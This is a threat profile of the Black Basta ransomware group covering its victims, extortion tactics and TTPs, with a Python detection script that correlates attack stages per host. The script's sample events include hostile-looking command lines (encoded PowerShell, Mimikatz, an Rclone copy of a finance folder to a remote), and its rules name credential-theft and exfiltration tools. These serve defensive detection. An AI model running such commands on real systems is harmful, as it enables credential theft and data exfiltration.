Black Basta is a Russian-speaking group that was first spotted in early 2022. It is known for its double extortion attack, where it not only executes ransomware but also exfiltrates sensitive data. If a victim fails to pay a ransom, the group operates a cybercrime marketplace to publicly release the stolen data. The group’s prolific targeting of at least 20 victims in its first two weeks of operation indicates that it is experienced in ransomware and has a steady source of initial access.

The group is suspected to be a rebrand of the Russian-speaking RaaS threat group Conti, or to be linked to other Russian-speaking cyber threat groups, because of the sophistication of its ransomware operators and its reluctance to recruit or advertise on Dark Web forums.

Recent Attacks

In 2023, Black Basta has continued its wave of attacks, targeting various organizations across different sectors. Notably, BankCard USA (BUSA), a provider of end-to-end electronic payment products and services to more than 100,000 American companies, fell victim to Black Basta. The company reportedly paid a $50,000 ransom to the group after a month-long negotiation. Despite assurances of no publication upon payment, some of BUSA’s financial documents and passports were made public.

Other victims in 2023 include the Swiss multinational corporation ABB, UK-based outsourcing company Capita, and Yellow Pages Canada. The attack on Capita is estimated to cost over £15m, demonstrating the significant financial impact of Black Basta’s operations.

Negotiation Tactics and Data Handling

Black Basta’s negotiation tactics involve demanding a high ransom and settling for less after a series of negotiations. However, the group does not always keep its promise of keeping the breach confidential, even after receiving the ransom payment. In the BUSA case, the breach and the ransom payment became public knowledge. The handling of exfiltrated data post-ransom payment remains unclear, raising concerns about the safety of sensitive data even after the ransom has been paid.

Victim’s Response

The response from victims following a breach varies. In the case of BUSA, it’s unclear whether the company notified its customers, employees, or the state of California about the data breach. No notice was posted on the California Attorney General’s site, despite the company being aware of the breach for about a month.

Impact to Health and Public Health (HPH) Sector

Black Basta has already attacked several health and public health sector organizations in 2022, making it a credible threat to the sector. In its first year alone, the group exclusively targeted U.S.-based organizations, seeking to purchase network access credentials for companies specifically located there. The group has affected the websites of specific health information technology, healthcare industry services, laboratory and pharmaceutical, and health plan organizations across multiple states, and has stolen several gigabytes of personally identifiable information (PII) belonging to members of health organizations, their customers, and their employees.

Impact on Various Sectors

Black Basta poses a significant threat to various sectors. While it has attacked several health and public health sector organizations in 2022, its recent attacks on BUSA and Capita show that it is also a credible threat to the financial and outsourcing sectors.

Common Tactics, Techniques, and Procedures (TTPs)

Black Basta operators utilize distinctive TTPs to gain entry, spread laterally, exfiltrate data, and drop ransomware. The ransomware is cross-platform and runs only with administrator privileges, on both Windows and Linux systems. The group uses stolen credentials (purchased on the Dark Web) to get into organizations’ systems, and initial access is often acquired via malicious links in a phishing e-mail. The group uses numerous tools and remote access methods, including Qakbot (aka QBot), SystemBC, Mimikatz, Cobalt Strike, and Rclone.

  1. Initial Access: Spearphishing Link (T1192) – This technique involves sending a spearphishing email with a link to a malicious website or payload to the victim. More details can be found on the MITRE ATT&CK website.
  2. Execution: Scripting (T1064) – This technique involves the use of a script to execute commands on a system. The ransomware executed by Black Basta could be using scripts. More details can be found on the MITRE ATT&CK website.
  3. Persistence: Valid Accounts (T1078) – This technique involves the use of stolen credentials to maintain access to systems. More details can be found on the MITRE ATT&CK website.
  4. Lateral Movement: Remote Desktop Protocol (T1076) – This technique involves the use of Remote Desktop Protocol (RDP) to move laterally across a network. More details can be found on the MITRE ATT&CK website.
  5. Exfiltration: Data Compressed (T1002) – This technique involves compressing data to facilitate exfiltration. More details can be found on the MITRE ATT&CK website.
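The chain above (valid-account RDP logon, script execution, credential tooling, Rclone-based exfiltration) is more useful as a detection when the stages are correlated per host than when each fires alone. The following is an added example, not code from the original profile or from any vendor: a small correlation over constructed Windows-style events, where the rule names, field names and sample events are this example's own assumptions.

```python
from collections import defaultdict

# Constructed sample events (not real telemetry): a subset of the fields a
# Windows security / Sysmon pipeline would carry. Logon type 10 is RDP
# (RemoteInteractive); "-enc" is PowerShell's -EncodedCommand abbreviation.
SAMPLE_EVENTS = [
    {"host": "ws-01", "type": "logon", "logon_type": 10, "user": "svc_backup"},
    {"host": "ws-01", "type": "process", "image": "powershell.exe",
     "cmdline": "powershell.exe -enc SQBFAFgA"},
    {"host": "ws-01", "type": "process", "image": "mimikatz.exe",
     "cmdline": "mimikatz.exe"},
    {"host": "ws-01", "type": "process", "image": "rclone.exe",
     "cmdline": "rclone.exe copy D:\\Finance remote:backup"},
    {"host": "ws-02", "type": "logon", "logon_type": 10, "user": "jdoe"},
    {"host": "ws-02", "type": "process", "image": "notepad.exe",
     "cmdline": "notepad.exe"},
]

# One rule per stage named in the profile above. Rule labels are this
# example's own; the ATT&CK ids are the ones the profile cites. Matching on
# image names is a weak signal (binaries get renamed); it is kept simple here.
RULES = [
    ("rdp_logon", "T1076",
     lambda e: e["type"] == "logon" and e.get("logon_type") == 10),
    ("script_exec", "T1064",
     lambda e: e["type"] == "process"
     and e["image"].lower() in {"powershell.exe", "cscript.exe", "wscript.exe"}),
    ("cred_tool", "Mimikatz",
     lambda e: e["type"] == "process" and "mimikatz" in e["image"].lower()),
    ("rclone_exfil", "Rclone",
     lambda e: e["type"] == "process" and e["image"].lower().startswith("rclone")),
]


def match_techniques(events):
    """Return {host: {rule_name: attack_id}} for every rule that fired."""
    hits = defaultdict(dict)
    for event in events:
        for name, attack_id, predicate in RULES:
            if predicate(event):
                hits[event["host"]][name] = attack_id
    return dict(hits)


def flag_hosts(events, min_stages=3):
    """Hosts on which at least `min_stages` distinct stages fired.

    A lone RDP logon is routine administration; the chain is the signal."""
    hits = match_techniques(events)
    return sorted(h for h, rules in hits.items() if len(rules) >= min_stages)


if __name__ == "__main__":
    for host, rules in match_techniques(SAMPLE_EVENTS).items():
        print(host, rules)
    print("flagged:", flag_hosts(SAMPLE_EVENTS))
```

With the sample data only ws-01 is flagged; ws-02 shows a single RDP logon and stays below the threshold.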

Relationships

There is speculation that Black Basta may be an offshoot of the Russian-speaking RaaS threat group Conti, or that it includes some members of that formerly proficient group. Other researchers have observed links to the Russian-speaking RaaS threat group FIN7 (aka Carbanak/Cobalt Group/Carbon Spider). Black Basta has also exhibited similarities to the ransomware group known as BlackMatter.

CONTI & FIN7: MITRE ATT&CK


Defense and Mitigations

As RaaS threat groups become more prolific, healthcare organizations should remain vigilant and strengthen their defenses against ransomware attacks. Organizations can take several multilayered actions to minimize their exposure to and the potential impact of a ransomware attack.